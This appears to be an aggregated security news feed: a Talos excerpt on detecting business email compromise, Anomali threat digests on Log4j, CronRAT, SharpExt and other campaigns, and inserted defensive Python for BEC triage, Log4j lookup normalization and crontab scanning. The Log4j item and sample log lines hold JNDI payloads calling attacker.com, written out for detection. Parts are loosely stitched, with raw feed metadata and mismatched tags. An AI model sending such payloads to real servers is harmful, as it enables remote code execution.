Business email compromise (BEC) is one of the most financially damaging online crimes. Per the FBI's 2021 Internet Crime Report, the total loss in 2021 due to BEC was around 2.4 billion dollars; since 2013, BEC has resulted in 43 billion dollars in losses. The report defines BEC as a scam targeting businesses (not individuals) working with foreign suppliers and companies regularly performing wire transfer payments. Fraudsters carry out these sophisticated scams to conduct the unauthorized transfer of funds. This introduces the challenge of how to detect and block these campaigns as they continue to compromise organizations successfully.
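The four detection layers summarized above (an authorized-sender policy, lookalike-domain detection, a From/Reply-To mismatch check, and classification by the scam's intent) can be combined in one pass over a message's headers and body. The following is an added example written for this page, not code from Talos or from the article; the organization domain, the executive list, the keyword lists and the three sample messages are constructed assumptions, and the homoglyph folding plus edit-distance threshold is a simple stand-in for the trained profile the article describes. It also shows why the intent step matters: the technique checks alone only label a message odd, while intent plus a technique flag yields a BEC verdict with a scam type.

```python
"""Layered BEC triage over raw messages: policy, lookalike domain,
From/Reply-To mismatch, then scam-intent classification.
Added example for this page; not Talos code. All tenant data below is assumed."""
from email import message_from_string
from email.utils import parseaddr
from typing import Optional

# Assumed (hypothetical) tenant data a policy-based filter would hold:
# the organization's real domain and each executive's authorized address.
ORG_DOMAIN = "example-corp.com"
EXECUTIVES = {"jane doe": "jane.doe@example-corp.com"}

# Assumed keyword lists for the intent step; production would use a trained
# classifier, but the scam categories are what matters here.
INTENT_KEYWORDS = {
    "wire_transfer": ("wire transfer", "bank details", "pay this invoice"),
    "gift_card": ("gift card", "gift cards"),
    "payroll_diversion": ("direct deposit", "payroll"),
}

# Character swaps commonly used to build lookalike domains (rn -> m, 0 -> o, ...).
_HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"))


def fold_homoglyphs(s: str) -> str:
    """Normalize a domain so visually similar spellings compare equal."""
    s = s.lower()
    for bad, good in _HOMOGLYPHS:
        s = s.replace(bad, good)
    return s


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a small value between unrelated domains means typosquatting."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_lookalike(domain: str, org_domain: str = ORG_DOMAIN) -> bool:
    """True for a domain that is not ours but is a homoglyph or at most 2 edits away."""
    domain = domain.lower()
    if domain == org_domain:
        return False
    return (fold_homoglyphs(domain) == fold_homoglyphs(org_domain)
            or levenshtein(domain, org_domain) <= 2)


def classify_intent(text: str) -> Optional[str]:
    """Return the first scam type whose keywords appear in the text, else None."""
    t = text.lower()
    for scam, words in INTENT_KEYWORDS.items():
        if any(w in t for w in words):
            return scam
    return None


def analyze(raw: str) -> dict:
    """Run the technique checks, then let intent decide the final verdict."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    _, reply = parseaddr(msg.get("Reply-To", ""))
    from_dom = addr.rpartition("@")[2].lower()
    reply_dom = reply.rpartition("@")[2].lower()
    body = msg.get_payload() if not msg.is_multipart() else ""

    flags = []
    authorized = EXECUTIVES.get(name.strip().lower())
    if authorized and addr.lower() != authorized:
        flags.append("impersonated_executive")   # policy: known name, wrong address
    if is_lookalike(from_dom):
        flags.append("lookalike_domain")
    if reply and reply_dom != from_dom:
        flags.append("reply_to_mismatch")

    intent = classify_intent(msg.get("Subject", "") + "\n" + body)
    if flags and intent:
        verdict = "bec"            # technique evidence plus a recognised scam goal
    elif flags or intent:
        verdict = "suspicious"     # one signal alone: route to review, not block
    else:
        verdict = "clean"
    return {"from": addr, "reply_to": reply, "flags": flags,
            "intent": intent, "verdict": verdict}


# Constructed sample messages (not real traffic).
SAMPLES = {
    "lookalike": ("From: Jane Doe <jane.doe@exarnple-corp.com>\n"
                  "To: ap@example-corp.com\nSubject: Urgent\n\n"
                  "Please pay this invoice today by wire transfer. I'm in a meeting.\n"),
    "freemail": ("From: Jane Doe <janedoe.ceo@gmail.com>\n"
                 "Reply-To: ceo.office@proton.example\n"
                 "To: assistant@example-corp.com\nSubject: Quick task\n\n"
                 "Can you buy 5 gift cards and send me the codes?\n"),
    "legit": ("From: Jane Doe <jane.doe@example-corp.com>\n"
              "To: team@example-corp.com\nSubject: Offsite agenda\n\n"
              "Attaching the agenda for Thursday.\n"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, analyze(raw))
```

Running the block prints a verdict per sample: the typosquatted sender and the free-mail sender both come out as "bec" with a scam type (wire_transfer and gift_card), while the genuine executive mail is "clean". The homoglyph table and the edit-distance cutoff are deliberately small; in a real deployment the lookalike check should be run against the registered domain only and the digit folds (0, 1, 3) tuned to avoid flagging legitimate domains that contain numbers.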
There are a variety of approaches to identifying BEC email messages, such as using policy to allow emails only from authorized email addresses, detecting exploitation techniques used by threat actors, building profiles by analysis of emails, and validating against the profile to detect BEC. These approaches have a variety of limitations or shortcomings. Cisco Talos is taking a different approach and using an intent-based model to identify and block BEC messages. Before we get too deep into the intent-based model, take a deeper look at the commonly used approaches to block BEC, from the simplistic through machine learning (ML) approaches.
Policy-based detection: The first place to start is with policy-based detection, as it is one of the most common and simplistic approaches to blocking BEC campaigns. Let's start by looking at an example of a BEC email.
Published 2022-10-18T08:41:18+00:00. http://blog.talosintelligence.com/2022/10/the-benefits-of-taking-intent-based.html

Dark Reading: Sophisticated Hermit Mobile Spyware Heralds Wave of Government Surveillance
Published 2022-09-21T18:36:17+00:00. https://www.darkreading.com/application-security/sophisticated-hermit-mobile-spyware-government-surveillance

Fortinet: Meeting the "Ministrer"
Published 2022-09-19T13:47:00+00:00. https://www.fortinet.com/blog/threat-research/konni-rat-phishing-email-deploying-malware

Anomali Cyber Watch: First Real-Life Video-Spoofing Attack, MagicWeb Backdoors via Non-Standard Key Identifier, LockBit Ransomware Blames Victim for DDoSing Back, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
LastPass Hackers Stole Source Code (published: August 26, 2022)
In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass's development environment. LastPass stated that it happened through a single compromised developer account and that the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults.
Analyst Comment: This incident doesn't seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment, since "white-box hacking" (when the source code of the attacked system is known) is easier for threat actors. Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development.
Tags: LastPass, Password manager, Data breach, Source code
Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli (published: August 25, 2022)
Starting in July 2022, a new campaign by the Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers found that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence, Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools to the startup folders and autostart extensibility point (ASEP) registry keys. Overall, the group heavily used various open-source and built-in operating system tools: eHorus remote management software, the Ligolo reverse tunneling tool, the Mimikatz credential theft tool, PowerShell programs, the RemCom remote service, the Venom proxy tool, and Windows Management Instrumentation (WMI).
Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomalies, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to the SysAidServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account.
MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1003 - OS Credential Dumping | T1566 - Phishing | […]
Published 2022-08-30T15:01:00+00:00. https://www.anomali.com/blog/anomali-cyber-watch-first-real-life-video-spoofing-attack-magicweb-backdoors-via-non-standard-key-identifier-lockbit-ransomware-blames-victim-for-ddosing-back-and-more

Kaspersky (Securelist): Kimsuky's GoldDragon cluster and its C2 operations
Published 2022-08-25T01:00:31+00:00. https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/

Cisco Talos: Ukraine and the fragility of agriculture security
By Joe Marshall. The war in Ukraine has had far-reaching global implications, and one of the most immediate effects felt will be on the global supply chain for food. This war-induced fragility has exposed the weaknesses of how we feed ourselves globally.
Ransomware cartels and other adversaries are well aware of this and are actively exploiting that fragility. For the past six years, Cisco Talos has been actively involved in assisting public and private institutions in Ukraine to defend themselves against state-sponsored actors. Our involvement stretches the gamut from commercial to critical infrastructure, to election security. Our presence has afforded us unique opportunities and observations about cybersecurity in a macro and micro way. Ukraine has been a frequent victim of state-sponsored cyber attacks aimed at critical infrastructure like power and transportation. Talos is proud to stand with our partners in Ukraine and help defend their critical networks and help users there maintain access to necessary services. Now that Russia has invaded Ukraine, those threats have escalated to kinetic attacks that are wreaking havoc on a critical element of our world: agriculture and our global food supply chain. Even worse are the implications this war will have for future cyber attacks, as fragility is considered a lucrative element in deciding victimology by threat actors like ransomware cartels. To truly grasp the implications of the war in Ukraine, we have to examine how vital Ukrainian agriculture is in feeding the world, the current state of affairs, and what this means for the global cybersecurity posture to protect agricultural assets.
Where there is weakness, there is opportunity: Ransomware cartels and their affiliates are actively targeting the agricultural industry. Moreover, these actors have done their homework and are targeting agricultural companies during the two times of the year when they cannot suffer disruptions: planting and harvesting. Per the published FBI PIN Alert: "Cyber actors may perceive cooperatives as lucrative targets with a willingness to pay due to the time-sensitive role they play in agricultural production." This is far from unusual for these adversaries: they are shrewd and calculating, and understand their victims' weaknesses and industries. H
Published 2022-08-18T08:00:00+00:00. http://blog.talosintelligence.com/2022/08/ukraine-and-fragility-of-agriculture.html

NoticeBored: CISO workshop slides
A glossy, nicely-constructed and detailed PowerPoint slide deck by Microsoft Security caught my beady eye this morning. The title 'CISO Workshop: Security Program and Strategy' with 'Your Name Here' suggests it might be a template for use in a workshop/course bringing CISOs up to speed on the governance, strategic and architectural aspects of information security, but in fact, given the amount of technical detail, it appears to be aimed at informing IT/technology managers about IT or cybersecurity specifically. Maybe it is intended for newly-appointed CISOs or more junior managers who aspire to be CISOs, helping them clamber up the pyramid (slide 87 of 142):
Published 2022-08-06T10:46:21+00:00. http://blog.noticebored.com/2022/08/a-glossy-nicely-constructed-and.html

Anomali Cyber Watch: Velvet Chollima Steals Emails from Browsers, Austrian Mercenary Leverages Zero-Days, China-Sponsored Group Uses CosmicStrand UEFI Firmware Rootkit, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
SharpTongue Deploys Clever Mail-Stealing Browser Extension "SHARPEXT" (published: July 28, 2022)
Volexity researchers discovered SharpExt, a new malicious browser app used by the North Korea-sponsored Velvet Chollima (Kimsuky, SharpTongue, Thallium) group. SharpExt inspects and exfiltrates data from a victim's webmail (AOL or Gmail) account as they browse it. Velvet Chollima continues to add new features to the app; the latest known version (3.0) supports three browsers: Microsoft Edge, Google Chrome, and Whale, the latter used almost exclusively in South Korea. Following the initial compromise, Velvet Chollima deploys SharpExt and, to avoid warning the victim, manually exfiltrates the browser's settings files in order to change the settings and generate a valid "super_mac" security check value. They also hide the newly opened DevTools window and any other warning windows, such as the warning about extensions running in developer mode.
Analyst Comment: Velvet Chollima is known for its tactic of deploying malicious browser extensions, but in the past it concentrated on stealing credentials instead of emails. The group continues aggressive cyberespionage campaigns exfiltrating military and industrial technologies from Europe, South Korea, and the US. Network defenders should monitor for suspicious instances of PowerShell execution, as well as for traffic to and from known Velvet Chollima infrastructure (available in Anomali Match).
MITRE ATT&CK: T1176 - Browser Extensions | T1114 - Email Collection | T1059 - Command and Scripting Interpreter | T1564 - Hide Artifacts
Tags: SharpExt, Velvet Chollima, Kimsuky, SharpTongue, Thallium, APT, North Korea, source-country:KP, South Korea, target-country:KR, USA, target-country:US, target-region:Europe, AOL, Gmail, Edge, Chrome, Whale, PowerShell, VBS, Browser extension
Untangling KNOTWEED: European Private-Sector Offensive Actor Using 0-Day Exploits (published: July 27, 2022)
Microsoft researchers detail the activity of DSIRF, an Austrian private-sector offensive actor (PSOA). In 2021, this actor, tracked as Knotweed, used four Windows and Adobe 0-day exploits. In 2022, DSIRF was exploiting an Adobe Reader vulnerability together with a Windows privilege-escalation flaw, CVE-2022-22047, which was patched in July 2022. DSIRF attacks rely on their malware toolset called Subzero. The initial downloader shellcode is executed from either the exploit chains or malicious Excel documents. It downloads a JPG image file with extra encrypted data, then extracts, decrypts and loads into memory the Corelump memory-only infostealer. For persistence, Corelump creates trojanized copies of legitimate Windows DLLs that se[…]
Published 2022-08-02T15:17:00+00:00. https://www.anomali.com/blog/anomali-cyber-watch-velvet-chollima-steals-emails-from-browsers-austrian-mercenary-leverages-zero-days-china-sponsored-group-uses-cosmicstrand-uefi-firmware-rootkit-and-more

Security Affairs: Is APT28 behind the STIFF#BIZON attacks attributed to North Korea-linked APT37?
The North Korea-linked APT37 group targets high-value organizations in the Czech Republic, Poland, and other countries.
Researchers from the Securonix Threat Research (STR) team have uncovered a new attack campaign, tracked as STIFF#BIZON, targeting high-value organizations in multiple countries, including Czech Republic, and Poland. The researchers attribute this campaign to the North Korea-linked APT37 group, aka […] ]]> 2022-07-24T13:53:53+00:00 https://securityaffairs.co/wordpress/133605/apt/apt37-stiffbizon-campaign.html www.secnews.physaphae.fr/article.php?IdArticle=5923023 False Threat,Cloud APT 37,APT 28 None Bleeping Computer - Magazine Américain North Korean hackers attack EU targets with Konni RAT malware 2022-07-23T12:08:04+00:00 https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/ www.secnews.physaphae.fr/article.php?IdArticle=5907099 False Malware,Threat,Cloud APT 37 None Security Affairs - Blog Secu Apple Lockdown Mode will protect users against highly targeted cyberattacks Apple plans to introduce a security feature, called Lockdown Mode, to protect its users against “highly targeted cyberattacks.” The recent wave of sophisticated attacks against Apple users (i.e. Pegasus, DevilsTongue, and Hermit) urged the tech giant to develop a new security feature, called Lockdown Mode, to protect its users against highly targeted cyberattacks. The new feature will be implemented in iOS 16, iPadOS […] ]]> 2022-07-09T16:53:07+00:00 https://securityaffairs.co/wordpress/133065/mobile-2/apple-lockdown-mode.html www.secnews.physaphae.fr/article.php?IdArticle=5631802 False Cloud APT 37 None Malwarebytes Labs - MalwarebytesLabs Hermit spyware is deployed with the help of a victim\'s ISP 2022-06-29T10:03:54+00:00 https://blog.malwarebytes.com/reports/2022/06/hermit-spyware-is-deployed-with-the-help-of-a-victims-isp/ www.secnews.physaphae.fr/article.php?IdArticle=5448875 False Cloud APT 37 None SecureMac - Security focused on MAC What is iOS Hermit spyware? 
iOS Hermit spyware is a commercial-grade surveillance tool derived from a known Android surveillance tool. Learn more, plus how to stay safe.
2022-06-24T15:00:00+00:00 https://www.securemac.com/news/what-is-ios-hermit-spyware
Feed tags: Tool, Cloud | Actors: APT 37

ZDNet: Google details commercial spyware that targets both Android and iOS devices
2022-06-24T12:37:15+00:00 https://www.zdnet.com/article/google-details-commercial-spyware-that-targets-both-android-and-ios-devices/#ftag=RSSbaffb68
Feed tags: Cloud | Actors: APT 37

The Hacker News: Google Says ISPs Helped Attackers Infect Targeted Smartphones with Hermit Spyware
2022-06-24T03:40:50+00:00 https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html
Feed tags: Malware, Cloud | Actors: APT 37

IT Security Guru: Lookout Discovers Android Spyware Deployed in Kazakhstan
2022-06-21T08:58:07+00:00 https://www.itsecurityguru.org/2022/06/21/lookout-discovers-android-spyware-deployed-in-kazakhstan/?utm_source=rss&utm_medium=rss&utm_campaign=lookout-discovers-android-spyware-deployed-in-kazakhstan
Feed tags: Cloud | Actors: APT 37

Security Affairs: Experts link Hermit spyware to Italian surveillance firm RCS Lab and a front company
Experts uncovered an enterprise-grade surveillance malware dubbed Hermit that has been used to target individuals in Kazakhstan, Syria, and Italy since 2019. Lookout Threat Lab researchers found the Android version of Hermit being used by the government of Kazakhstan to track individuals within the country.
The latest samples of this spyware were detected by the researchers in April 2022, four […]
2022-06-17T20:00:33+00:00 https://securityaffairs.co/wordpress/132363/malware/hermit-spyware-italian-surveillance-firm.html
Feed tags: Malware, Threat, Cloud | Actors: APT 37

The Hacker News: Researchers Uncover 'Hermit' Android Spyware Used in Kazakhstan, Syria, and Italy
2022-06-17T06:12:54+00:00 https://thehackernews.com/2022/06/researchers-uncover-hermit-android.html
Feed tags: Cloud | Actors: APT 37

Dark Reading: Android Spyware 'Hermit' Discovered in Targeted Attacks
2022-06-16T19:09:44+00:00 https://www.darkreading.com/mobile/android-spyware-hermit-discovered-in-targeted-attacks
Actors: APT 37

Global Security Mag: Lookout discovers Android spyware deployed in Kazakhstan (category: Malware)
2022-06-16T12:45:37+00:00 http://www.globalsecuritymag.fr/Lookout-decouvre-un-logiciel,20220616,126738.html
Feed tags: Cloud | Actors: APT 37

SecurityWeek: Sophisticated Android Spyware 'Hermit' Used by Governments
2022-06-16T11:55:20+00:00 https://www.securityweek.com/sophisticated-android-spyware-hermit-used-governments
Actors: APT 37

Anomali: Anomali Cyber Watch: Time-to-Ransom Under Four Hours, Mustang Panda Spies on Russia, Ricochet Chollima Sends Goldbackdoor to Journalists, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence

A Lookback Under the TA410 Umbrella: Its Cyberespionage TTPs and Activity (published: April 28, 2022)
ESET researchers identified three distinct teams operating under the China-sponsored cyberespionage umbrella group TA410, which is loosely linked to Stone Panda (APT10, associated with the Chinese Ministry of State Security). ESET named these teams FlowingFrog, JollyFrog and LookingFrog. FlowingFrog uses the Royal Road RTF weaponizer described by Anomali in 2019; its infection has two stages, the Tendyron implant followed by the very complex FlowCloud backdoor. JollyFrog relies on generic malware such as PlugX and QuasarRAT. LookingFrog's infection stages feature the X4 backdoor followed by the LookBack backdoor. Apart from using different backdoors and operating from IP addresses in three different districts, the three teams share similar tools and similar tactics, techniques, and procedures (TTPs).
Analyst Comment: Organizations should keep web-facing applications such as Microsoft Exchange or SharePoint patched and hardened, and train employees to handle suspected spearphishing attempts. Defense in depth (layered security mechanisms, redundancy, fail-safe processes) covering both network and host-based security is the best way to limit exposure to APTs; prevention and detection capabilities should both be in place.
MITRE ATT&CK: Exploit Public-Facing Application - T1190 | Phishing - T1566 | Native API - T1106 | Shared Modules - T1129 | Exploitation for Client Execution - T1203 | Inter-Process Communication - T1559 | Windows Management Instrumentation - T1047 | Scheduled Task - T1053 | Server Software Component - T1505 | Create or Modify System Process - T1543 | Obfuscated Files or Information - T1027 | Masquerading - T1036 | Rootkit - T1014 | Process Injection - T1055 | […]
2022-05-03T16:31:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-time-to-ransom-under-four-hours-mustang-panda-spies-on-russia-ricochet-chollima-sends-goldbackdoor-to-journalists-and-more
Feed tags: Ransomware, Malware, Tool, Vulnerability, Threat, Guideline, Cloud | Actors: APT 10, APT 37

CVE List (NVD): CVE-2022-29413
2022-04-28T17:15:39+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29413
Feed tags: Guideline, Cloud | Actors: APT 37

CVE List (NVD): CVE-2022-29411
2022-04-28T17:15:39+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29411
Feed tags: Vulnerability, Cloud | Actors: APT 37

CVE List (NVD): CVE-2022-29412
2022-04-28T17:15:39+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29412
Feed tags: Cloud | Actors: APT 37

CVE List (NVD): CVE-2022-29410
2022-04-28T17:15:38+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29410
Feed tags: Vulnerability, Cloud | Actors: APT 37
Threatpost: Nation-state Hackers Target Journalists with Goldbackdoor Malware
2022-04-26T11:38:17+00:00 https://threatpost.com/hackers-target-journalists-goldbackdoor/179389/
Feed tags: Malware, Cloud | Actors: APT 37

IT Security Guru: North Korea targets journalists with novel malware
2022-04-26T10:13:51+00:00 https://www.itsecurityguru.org/2022/04/26/north-korea-targets-journalists-with-novel-malware/?utm_source=rss&utm_medium=rss&utm_campaign=north-korea-targets-journalists-with-novel-malware
Feed tags: Malware, Cloud | Actors: APT 37

Security Affairs: North Korea-linked APT37 targets journalists with GOLDBACKDOOR
2022-04-26T08:25:03+00:00 https://securityaffairs.co/wordpress/130606/apt/apt37-targets-journalists-goldbackdoor.html
Feed tags: Cloud | Actors: APT 37

The Hacker News: North Korean Hackers Target Journalists with GOLDBACKDOOR Malware
2022-04-26T02:53:07+00:00 https://thehackernews.com/2022/04/north-korean-hackers-target-journalists.html
Feed tags: Malware, Threat, Cloud | Actors: APT 37

Anomali: Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, an open source Java logging package.
The Apache Software Foundation (ASF) rates the vulnerability 10.0 on the Common Vulnerability Scoring System (CVSS) scale. Cisco Talos observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. The vulnerability affects millions of users, proof-of-concept exploit code is public, and LunaSec has described the exploit chain in five steps:
1. Data from the user is sent to the server (via any protocol).
2. The server logs the data from the request, which contains the malicious payload ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server).
3. The payload triggers the Log4j lookup and the server makes a request to attacker.com via the Java Naming and Directory Interface (JNDI).
4. The response contains a path to a remote Java class file (e.g. http://second-stage.attacker.com/Exploit.class), which is loaded into the server process.
5. The loaded class is the second stage and lets the attacker execute arbitrary code.
Analyst Comment: Log4j 2.15.0 was released to address this vulnerability, but it mainly disables message lookups by default (the behaviour previously available through the log4j2.formatMsgNoLookups setting) and restricts where JNDI may connect; if lookups are re-enabled by configuration the library is vulnerable again, and that release was subsequently found to be incomplete (CVE-2021-45046), with message lookups removed entirely in 2.16.0. Upgrade rather than relying on the flag. The initial campaigns could be detected by filtering on keywords such as "ldap" or "jndi", but that check is trivially bypassed with nested lookups (for example ${${lower:j}ndi:...} or ${::-j}ndi), so detection needs to normalize the lookup syntax before matching.
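The analyst comment above says that filtering on "jndi" or "ldap" is easily bypassed. This added example (not Anomali's or LunaSec's code) shows why, and what a sturdier check looks like: it resolves the nested ${lower:}, ${upper:} and ${...:-default} lookups that attackers use for obfuscation before looking for a jndi: lookup, and contrasts the result with the naive keyword match over a few constructed log lines. The host names and log lines are made up, and the resolver only approximates Log4j's lookup semantics, so it is a detection aid rather than a guarantee.

```python
import re

# Constructed sample log lines (not from the Anomali or LunaSec write-ups):
# a plain probe, two obfuscated probes, a harmless Log4j lookup, and a
# benign line that merely contains the word "jndi".
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "User-Agent: ${jndi:ldap://attacker.com/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "User-Agent: ${${lower:j}${upper:n}di:${::-l}${::-d}ap://attacker.com/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "X-Api-Version: ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://attacker.com/x}"',
    '10.0.0.8 - - "GET /search?q=${date:yyyy} HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (jndi-test build)"',
]

# An innermost lookup: ${...} whose body contains no further "$", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_PLACEHOLDER = "\x00LOOKUP%d\x00"
_PLACEHOLDER_RE = re.compile(r"\x00LOOKUP(\d+)\x00")


def normalize_lookups(text: str) -> tuple[str, list[str]]:
    """Resolve nested Log4j-style lookups from the inside out.

    Mirrors the three tricks seen in the wild: ${lower:x} / ${upper:x} case
    changes, and ${anything:-default}, where a lookup that cannot resolve
    (e.g. ${env:NaN:-j} or the empty ${::-j}) falls back to its default.
    Anything else is treated as a terminal lookup (jndi:, date:, ...) and
    returned separately. This approximates Log4j's resolver; it is not a
    re-implementation of it.
    """
    terminals: list[str] = []
    while True:
        m = INNERMOST.search(text)
        if not m:
            break
        body = m.group(1)
        low = body.lower()
        if low.startswith("lower:"):
            repl = body[6:].lower()
        elif low.startswith("upper:"):
            repl = body[6:].upper()
        elif ":-" in body:
            repl = body.split(":-", 1)[1]
        else:
            terminals.append(body)
            repl = _PLACEHOLDER % (len(terminals) - 1)
        text = text[:m.start()] + repl + text[m.end():]
    # put the terminal lookups back so the normalized line stays readable
    text = _PLACEHOLDER_RE.sub(lambda p: "${" + terminals[int(p.group(1))] + "}", text)
    return text, terminals


def find_jndi(line: str) -> list[str]:
    """JNDI targets (the part after 'jndi:') present in a line after normalization."""
    _, lookups = normalize_lookups(line)
    hits = []
    for body in lookups:
        key, _, rest = body.partition(":")
        if key.strip().lower() == "jndi":
            hits.append(rest)
    return hits


def naive_keyword_match(line: str) -> bool:
    """The keyword filter the analyst comment warns about."""
    low = line.lower()
    return "jndi" in low or "ldap" in low


def scan_log(lines: list[str]) -> dict[int, list[str]]:
    """Map line index -> JNDI targets for every line that carries one."""
    return {i: hits for i, line in enumerate(lines) if (hits := find_jndi(line))}


if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LOG_LINES):
        normalized, _ = normalize_lookups(line)
        print(i, "naive:", naive_keyword_match(line), "normalized hits:", find_jndi(line))
        print("   ", normalized)
```

The naive filter misses both obfuscated probes and fires on the harmless "jndi-test" string; the normalized check flags exactly the three probes and extracts the callback target for blocking and pivoting. Log4j also honours other lookup prefixes (sys:, env:, date: and more, all of which can be combined with :- defaults), so feed anything that still contains a ${ after normalization to a human or a stricter rule.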
MITRE ATT&CK: Exploit Public-Facing Application - T1190 | Exploitation for Client Execution - T1203 | Command and Scripting Interpreter - T1059 | Remote Services - T1021 | OS Credential Dumping - T1003 | Resource Hijacking - T1496 | Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file

Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021)
Researchers from the DevOps firm JFrog found at least 17 malicious packages on the open source npm registry for JavaScript. The package names are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 […]
2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more
Feed tags: Malware, Tool, Vulnerability, Threat, Cloud | Actors: APT 29, APT 25, APT 37, APT 15

The Hacker News: Warning: Yet Another Bitcoin Mining Malware Targeting QNAP NAS Devices
2021-12-07T22:33:02+00:00 https://thehackernews.com/2021/12/warning-yet-another-bitcoin-mining.html
Feed tags: Malware, Cloud | Actors: APT 37

Anomali: Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence

New Malware Hides as Legit Nginx Process on E-Commerce Servers (published: December 2, 2021)
Researchers at Sansec discovered NginRAT, a new malware variant found on servers in the US, Germany, and France. Deployed to intercept credit card payments, it masquerades as a legitimate nginx process, which makes it very difficult to spot. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that hides in cron entries scheduled for calendar days that never occur (such as February 31st). The entries are valid enough for cron to keep them but never run them, which gives the malware a persistence foothold: even if the malicious process is killed, it has a way to re-infect the system.
Analyst Comment: Threat actors continually adapt to the security environment to remain effective. New techniques can still be spotted with behavioural analysis and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and keep a baseline of what normal traffic looks like on your network so that unusual traffic and connections to and from the network stand out as potential malicious activity.
MITRE ATT&CK: Obfuscated Files or Information - T1027 | Shared Modules - T1129
Tags: NginRAT, CronRAT, Nginx, North America, EU

How Phishing Kits Are Enabling A New Legion Of Pro Phishers (published: December 2, 2021)
Phishing kits such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting customers of companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are asked to verify account details, and the attack is made to appear legitimate by redirecting to the real sites after the information has been harvested.
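The CronRAT entry above describes a trojan that parks itself in cron entries for calendar days that never occur. This added example (not Sansec's or Anomali's code) is a small crontab scanner that expands the day-of-month and month fields and flags entries that can never fire, taking into account that Vixie cron runs a job when either day-of-month or day-of-week matches if both are restricted. The crontab below is constructed for the demo, and the scanner deliberately covers only standard numeric fields: month or weekday names, the @daily shortcuts and non-standard extensions are skipped rather than parsed.

```python
# Days per month; 29 for February so that a Feb 29 job still counts as live (leap years).
DAYS_IN_MONTH = {1: 31, 2: 29, 3: 31, 4: 30, 5: 31, 6: 30,
                 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}

# Constructed crontab (not from the Sansec report). Lines 4-6 can never run.
SAMPLE_CRONTAB = """\
# constructed sample crontab
SHELL=/bin/sh
0 2 * * * /usr/bin/certbot renew --quiet
52 23 31 2 * /tmp/.x/update
15 4 30 2 * /var/tmp/.cache/run
0 0 31 4,6,9,11 * /opt/backup.sh
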